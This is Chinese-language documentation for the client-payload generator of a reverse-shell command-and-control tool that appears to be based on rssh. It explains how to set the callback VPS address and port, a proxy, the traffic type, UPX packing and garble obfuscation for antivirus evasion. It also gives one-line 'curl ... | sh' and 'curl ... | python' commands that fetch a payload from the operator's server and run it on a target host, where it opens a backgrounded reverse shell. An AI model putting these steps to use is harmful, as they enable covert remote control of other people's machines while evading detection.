客户端生成
左侧菜单栏点击 客户端 - 客户端生成 进入Payload生成界面。
- 文件名: 生成的Payload名,只允许
大小写字母、数字、_和.,注意命名格式,Windows结尾.exe,so和dll文件结尾.so/.dll - 回连地址: 反弹Shell回连地址,即您部署的公网VPS IP,只能为有效IP格式
- 回连端口: 反弹Shell回连端口,即rssh服务器开放端口,默认为3232,若docker启动时有调整,相应变成自己设置的端口,只能为有效端口格式
- 系统架构: 要生成Paylaod的系统架构类型,即目标主机的系统架构,支持关键词搜索
- 代理地址: 反弹Shell回连代理地址,只能为有效IP格式,仅支持http代理
- 代理端口: 反弹Shell回连代理端口,只能为有效端口格式
- 流量类型: 流量类型默认
ssh,可选tls、websockets和secure websockets,如需自定义tls证书,可在./volume/rssh/tls目录中放置证书文件,将tls cert文件命名为tls.cert,tls key文件命名为tls.key,然后重启docker - 压缩: upx加壳压缩,不对体积有要求的话不建议使用,特征明显
- 免杀: garble混淆,免杀效果自测
客户端Payload在目标主机执行即可反弹Shell,执行时会Fork一个子进程在后台运行,同时打印一条Fork信息,此时客户端将不会显示任何输出信息,如果您需要调试客户端,请执行客户端时加上 --foreground 。
客户端Paylaod支持通过参数动态设置值,格式:./client -d <回连地址>:<回连端口> --proxy <代理地址>:<代理端口> --process_name <进程名>
表格中展示了已生成的客户端列表
- 图标
: 刷新已生成的客户端列表
- 搜索: 支持关键词搜索客户端
: 刷新已生成的客户端列表- 下载: 可右键复制链接地址,在目标主机上使用
- 复制sh命令: 可复制shell一行上线命令,格式:
curl http://<公网地址>:<rssh端口>/<客户端文件名>.sh | sh - 复制py命令: 可复制python一行上线命令,格式:
curl http://<公网地址>:<rssh端口>/<客户端文件名>.py | python - 删除: 删除客户端Payload
一行命令上线功能需要在docker容器启动前设置公网地址环境变量,格式:export EXTERNAL_ADDRESS=<公网地址>:<rssh公网端口>
列表中版本指客户端Payload的版本,与生成时rssh服务端的版本一致。